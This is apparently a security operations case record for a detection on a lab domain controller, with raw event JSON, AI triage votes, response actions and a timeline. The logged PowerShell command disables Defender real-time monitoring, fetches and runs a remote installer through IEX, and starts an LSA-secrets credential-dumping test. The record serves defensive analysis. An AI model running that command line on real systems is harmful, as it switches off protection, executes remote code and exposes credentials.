high closed true positive

๐Ÿท๏ธ Analyst Verdict Classification

TP by analyst

🤖 AI Analysis

🔔 Detections (1)

Realtime Monitoring Process Killed PID 3600 high
Rule: general.RealTime Monitoring Tampering
Hostname: df-labsdc01.dflabs.local · Sensor: e4a1c62d-4d1f-44...
Event Type: NEW_PROCESS
Confidence: 88% · Verdict: true positive
Event Data:
BASE_ADDRESS:
140694944940032
COMMAND_LINE:
PowerShell.exe Set-ExecutionPolicy Unrestricted ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force; Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1' -UseBasicParsing) ; Install-AtomicRedTeam -Force -getAtomics; Invoke-AtomicTest T1003.004 -CheckPrereqs ; Invoke-AtomicTest T1003.004 -GetPrereqs ; Invoke-AtomicTest T1003.004
FILE_IS_SIGNED:
1
FILE_PATH:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
HASH:
de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c
MEMORY_USAGE:
210673664
PARENT:
{'BASE_ADDRESS': 140698856259584, 'COMMAND_LINE': 'cmd.exe /C C:\\Windows\\TEMP\\pldC873.tmp.bat T1003.004 ', 'FILE_IS_SIGNED': 1, 'FILE_PATH': 'C:\\Windows\\System32\\cmd.exe', 'HASH': '3656f37a1c6951ec4496fabb8ee957d3a6e3c276d5a3785476b482c9c0d32ea2', 'MEMORY_USAGE': 4489216, 'PARENT_ATOM': 'd2b1ecad7af81b32ac16ae0d69c2a7fe', 'PARENT_PROCESS_ID': 3496, 'PROCESS_ID': 3600, 'THIS_ATOM': '603c0894c1efd30bc14ce13269c2a84d', 'THREADS': 3, 'TIMESTAMP': 1774364748698, 'USER_NAME': 'NT AUTHORITY\\SYSTEM'}
PARENT_PROCESS_ID:
3600
PROCESS_ID:
9092
THREADS:
30
USER_NAME:
NT AUTHORITY\SYSTEM
IOCs: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c C:\Windows\TEMP\pldC873.tmp.bat https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1
MITRE: T1562.001 T1059.001 T1003.004 T1105
Analyst Declaration:
📄 Raw Detection JSON
{
  "author": "ckeller@fusioncybersecurity.us",
  "cat": "Realtime Monitoring Process Killed PID 3600",
  "detect": {
    "event": {
      "BASE_ADDRESS": 140694944940032,
      "COMMAND_LINE": "PowerShell.exe  Set-ExecutionPolicy Unrestricted ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force; Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR \u0027https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1\u0027 -UseBasicParsing) ; Install-AtomicRedTeam -Force -getAtomics; Invoke-AtomicTest T1003.004 -CheckPrereqs ; Invoke-AtomicTest T1003.004 -GetPrereqs ; Invoke-AtomicTest T1003.004 ",
      "FILE_IS_SIGNED": 1,
      "FILE_PATH": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
      "HASH": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
      "MEMORY_USAGE": 210673664,
      "PARENT": {
        "BASE_ADDRESS": 140698856259584,
        "COMMAND_LINE": "cmd.exe /C C:\\Windows\\TEMP\\pldC873.tmp.bat T1003.004 ",
        "FILE_IS_SIGNED": 1,
        "FILE_PATH": "C:\\Windows\\System32\\cmd.exe",
        "HASH": "3656f37a1c6951ec4496fabb8ee957d3a6e3c276d5a3785476b482c9c0d32ea2",
        "MEMORY_USAGE": 4489216,
        "PARENT_ATOM": "d2b1ecad7af81b32ac16ae0d69c2a7fe",
        "PARENT_PROCESS_ID": 3496,
        "PROCESS_ID": 3600,
        "THIS_ATOM": "603c0894c1efd30bc14ce13269c2a84d",
        "THREADS": 3,
        "TIMESTAMP": 1774364748698,
        "USER_NAME": "NT AUTHORITY\\SYSTEM"
      },
      "PARENT_PROCESS_ID": 3600,
      "PROCESS_ID": 9092,
      "THREADS": 30,
      "USER_NAME": "NT AUTHORITY\\SYSTEM"
    },
    "routing": {
      "arch": 2,
      "did": "",
      "event_id": "6220d8dd-dafe-4022-bc42-39c50347f3cc",
      "event_time": 1774364749274,
      "event_type": "NEW_PROCESS",
      "ext_ip": "67.60.122.240",
      "hostname": "df-labsdc01.dflabs.local",
      "iid": "47501359-645e-4049-906e-e6195da7afcf",
      "int_ip": "192.168.45.129",
      "latency": 2841,
      "moduleid": 2,
      "oid": "ad19afae-3759-4207-b06e-8648b225c455",
      "parent": "603c0894c1efd30bc14ce13269c2a84d",
      "plat": 268435456,
      "sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
      "tags": [
        "domain-controller",
        "fusion-soc-alert",
        "fusion-soc-case",
        "fusion-soc-pulled",
        "fusion-soc-triage"
      ],
      "this": "ce62e2fb3788a5371aa5449e69c2a84f"
    }
  },
  "detect_id": "1bd170b2-70e5-4fe6-9fc9-c94469c2a850",
  "gen_time": 1774364752117,
  "link": "https://app.limacharlie.io/orgs/ad19afae-3759-4207-b06e-8648b225c455/sensors/e4a1c62d-4d1f-4472-bae4-43291246b4d4/timeline?time=1774364749\u0026selected=ce62e2fb3788a5371aa5449e69c2a84f",
  "namespace": "general",
  "routing": {
    "arch": 2,
    "did": "",
    "event_id": "6220d8dd-dafe-4022-bc42-39c50347f3cc",
    "event_time": 1774364749274,
    "event_type": "NEW_PROCESS",
    "ext_ip": "67.60.122.240",
    "hostname": "df-labsdc01.dflabs.local",
    "iid": "47501359-645e-4049-906e-e6195da7afcf",
    "int_ip": "192.168.45.129",
    "latency": 2841,
    "moduleid": 2,
    "oid": "ad19afae-3759-4207-b06e-8648b225c455",
    "parent": "603c0894c1efd30bc14ce13269c2a84d",
    "plat": 268435456,
    "sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
    "tags": [
      "domain-controller",
      "fusion-soc-alert",
      "fusion-soc-case",
      "fusion-soc-pulled",
      "fusion-soc-triage"
    ],
    "this": "ce62e2fb3788a5371aa5449e69c2a84f"
  },
  "source": "ad19afae-3759-4207-b06e-8648b225c455.47501359-645e-4049-906e-e6195da7afcf.e4a1c62d-4d1f-4472-bae4-43291246b4d4.10000000.2",
  "source_rule": "general.RealTime Monitoring Tampering",
  "ts": 1774364752000
}
๐ŸŒ Threat Intel JSON
{
  "virustotal": {
    "malicious": false,
    "provider": "virustotal",
    "reputation": 73,
    "stats": {
      "confirmed-timeout": 0,
      "failure": 0,
      "harmless": 0,
      "malicious": 0,
      "suspicious": 0,
      "timeout": 0,
      "type-unsupported": 4,
      "undetected": 72
    }
  }
}
🤖 Triage JSON
{
  "confidence": 0.883,
  "false_positive_reason": null,
  "investigation_questions": [
    "Was there an authorized penetration test or Red Team exercise occurring at the time of the detection?",
    "What process or service created the batch file in the C:\\Windows\\TEMP directory?",
    "Are there any other similar events on this host or across the environment within the same timeframe?"
  ],
  "ioc_analysis": "The process powershell.exe is a legitimate Microsoft-signed binary. However, the command line is highly suspicious as it performs system tampering (disabling Defender) and executes code from a remote repository (GitHub) to perform credential dumping tests.",
  "iocs_extracted": [
    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
    "C:\\Windows\\TEMP\\pldC873.tmp.bat",
    "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1"
  ],
  "mitre_techniques": [
    "T1562.001",
    "T1059.001",
    "T1003.004",
    "T1105"
  ],
  "recommended_actions": [
    "Manual analyst review required \u2014 AI models (majority)",
    "Verify if this activity was authorized as part of a scheduled security simulation or audit.",
    "If unauthorized, isolate the affected sensor immediately and initiate incident response for host tampering and credential access.",
    "Enable PowerShell script block logging (EID 4104) to capture decrypted scripts executed via IEX.",
    "Review the contents of the batch file pldC873.tmp.bat to identify the initial infection vector or script source."
  ],
  "risk_score": 87,
  "severity": "high",
  "summary": "**Vote: MAJORITY (2/3 -\u003e TRUE POSITIVE)**\n\n### \u264a gemini-cli Analysis (Primary)\n**Verdict:** true_positive | **Confidence:** 1.0\nPowerShell was used to disable Windows Defender Real-time Monitoring and execute Atomic Red Team tests for credential dumping (LSA Secrets). While the use of the official Red Canary repository suggests this is a security simulation, the activity itself is a successful bypass of security controls and should be validated as authorized.\n\n**IOC Analysis:** The process powershell.exe is a legitimate Microsoft-signed binary. However, the command line is highly suspicious as it performs system tampering (disabling Defender) and executes code from a remote repository (GitHub) to perform credential dumping tests.\n\n---\n\n### \ud83e\udd16 qwen3.5:4b Analysis (Secondary)\n**Verdict:** true_positive | **Confidence:** 0.95\nThis event represents a high-confidence attack attempt where an attacker used PowerShell to disable real-time monitoring and execute the Atomic Red Team framework for testing T1003.004 (Exploitation Publicly Available Exploit). The process is signed by Microsoft but executed via suspicious command-line arguments that bypass security controls.\n\n**IOC Analysis:** The file path C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe is legitimate, and the binary is Microsoft-signed (FILE_IS_SIGNED: 1). However, the command line contains malicious indicators including Set-MpPreference to disable real-time monitoring, IEX (Invoke-Expression) with a URL from GitHub, and execution of Atomic Red Team tools. The parent process chain shows cmd.exe spawning PowerShell under SYSTEM privileges, which is suspicious for lateral movement or privilege escalation testing.\n\n---\n\n### \ud83e\udd16 deepseek-r1:8b Analysis (Secondary)\n**Verdict:** suspicious | **Confidence:** 0.7\nThe PowerShell process running as SYSTEM disables real-time monitoring and installs Atomic Red Team, a penetration testing tool, which is suspicious given the elevated privileges and parent process from TEMP. This could indicate evasion tactics or unauthorized red team activity.\n\n**IOC Analysis:** The FILE_PATH is a legitimate Windows PowerShell executable in the expected directory. The HASH is Microsoft-signed, indicating it\u0027s a trusted binary. However, the COMMAND_LINE includes commands to disable real-time monitoring and install Atomic Red Team, which is often used in adversary simulations but here runs as SYSTEM, raising suspicion. The PARENT_PROCESS is cmd.exe from TEMP, which is a common red flag for malicious scripts.",
  "verdict": "true_positive",
  "voting": {
    "auto_action": "manual_review",
    "mode": "majority",
    "total_models": 3,
    "vote_summary": [
      "gemini-cli: true_positive (high, 100% confidence)",
      "qwen3.5:4b: true_positive (critical, 95% confidence)",
      "deepseek-r1:8b: suspicious (high, 70% confidence)"
    ],
    "votes": [
      {
        "confidence": 1.0,
        "model": "gemini-cli",
        "verdict": "true_positive"
      },
      {
        "confidence": 0.95,
        "model": "qwen3.5:4b",
        "verdict": "true_positive"
      },
      {
        "confidence": 0.7,
        "model": "deepseek-r1:8b",
        "verdict": "suspicious"
      }
    ],
    "winning_count": 2,
    "winning_verdict": "true_positive"
  }
}

โš™๏ธ Response Actions

Action | Target | Status | Result
tag | e4a1c62d-4d1f-4472-bae4-43291246b4d4:fusionsoc-investigated | failed | 401 Client Error: Unauthorized for url: https://api.limacharlie.io/v1/e4a1c62d-4d1f-4472-bae4-43291246b4d4/tags?tags=fusionsoc-investigated
recommended | Manual analyst review required — AI models (majority) | executed | General Activity Sweep: 0 events found
recommended | Verify if this activity was authorized as part of a scheduled security simulation or audit. | executed | General Activity Sweep: 0 events found
recommended | If unauthorized, isolate the affected sensor immediately and initiate incident response for host tampering and credential access. | executed | Credential Access Check: 42 events found
recommended | Enable PowerShell script block logging (EID 4104) to capture decrypted scripts executed via IEX. | executed | General Activity Sweep: 0 events found
recommended | Review the contents of the batch file pldC873.tmp.bat to identify the initial infection vector or script source. | executed | File Activity Investigation: 0 events found

๐Ÿ“ Add Note

💬 Notes (6)

🤖 FusionSOC AI 2026-03-24T16:45
🤖 FusionSOC AI 2026-03-24T16:45
🤖 FusionSOC AI 2026-03-24T16:45
🤖 FusionSOC AI 2026-03-24T16:45
🤖 FusionSOC AI 2026-03-24T16:45
🤖 FusionSOC AI 2026-03-24T16:45

📜 Timeline

2026-03-24T17:24:18
analyst
Status changed: investigating → closed
2026-03-24T17:23:59
analyst
Analyst classified as True Positive (TP)
2026-03-24T16:45:10
FusionSOC AI
Status changed: investigating → investigating
2026-03-24T16:45:10
FusionSOC
Action recommended → executed: File Activity Investigation: 0 events found
2026-03-24T16:45:10
FusionSOC AI
Note by FusionSOC AI: ## 🔍 File Activity Investigation **Action:** Review the contents of the batch file pldC873.tmp.bat to identify the initi...
2026-03-24T16:45:09
FusionSOC
Response action queued: recommended on Review the contents of the batch file pldC873.tmp.bat to identify the initial infection vector or script source.
2026-03-24T16:45:09
FusionSOC AI
Status changed: investigating → investigating
2026-03-24T16:45:09
FusionSOC
Action recommended → executed: General Activity Sweep: 0 events found
2026-03-24T16:45:09
FusionSOC AI
Note by FusionSOC AI: ## 🔍 General Activity Sweep **Action:** Enable PowerShell script block logging (EID 4104) to capture decrypted scripts e...
2026-03-24T16:45:09
FusionSOC
Response action queued: recommended on Enable PowerShell script block logging (EID 4104) to capture decrypted scripts executed via IEX.
2026-03-24T16:45:09
FusionSOC AI
Status changed: investigating → investigating
2026-03-24T16:45:09
FusionSOC
Action recommended → executed: Credential Access Check: 42 events found
2026-03-24T16:45:09
FusionSOC AI
Note by FusionSOC AI: ## 🔍 Credential Access Check **Action:** If unauthorized, isolate the affected sensor immediately and initiate incident ...
2026-03-24T16:45:08
FusionSOC
Response action queued: recommended on If unauthorized, isolate the affected sensor immediately and initiate incident response for host tampering and credential access.
2026-03-24T16:45:08
FusionSOC AI
Status changed: investigating → investigating
2026-03-24T16:45:08
FusionSOC
Action recommended → executed: General Activity Sweep: 0 events found
2026-03-24T16:45:08
FusionSOC AI
Note by FusionSOC AI: ## 🔍 General Activity Sweep **Action:** Verify if this activity was authorized as part of a scheduled security simulatio...
2026-03-24T16:45:08
FusionSOC
Response action queued: recommended on Verify if this activity was authorized as part of a scheduled security simulation or audit.
2026-03-24T16:45:08
FusionSOC AI
Status changed: open → investigating
2026-03-24T16:45:08
FusionSOC
Action recommended → executed: General Activity Sweep: 0 events found
2026-03-24T16:45:08
FusionSOC AI
Note by FusionSOC AI: ## 🔍 General Activity Sweep **Action:** Manual analyst review required — AI models (majority) **Sensor:** `e4a1c62d-4d1f...
2026-03-24T16:45:07
FusionSOC
Response action queued: recommended on Manual analyst review required — AI models (majority)
2026-03-24T16:45:07
FusionSOC
Action tag → failed: 401 Client Error: Unauthorized for url: https://api.limacharlie.io/v1/e4a1c62d-4d1f-4472-bae4-43291246b4d4/tags?tags=fusionsoc-investigated
2026-03-24T16:45:07
FusionSOC
Response action queued: tag on e4a1c62d-4d1f-4472-bae4-43291246b4d4:fusionsoc-investigated
2026-03-24T16:45:07
FusionSOC AI
Detection 1bd170b2-70e5-4fe6-9fc9-c94469c2a850 triaged as true_positive (high severity, confidence: 88%)
2026-03-24T16:45:07
FusionSOC AI
Case created from detection: general.RealTime Monitoring Tampering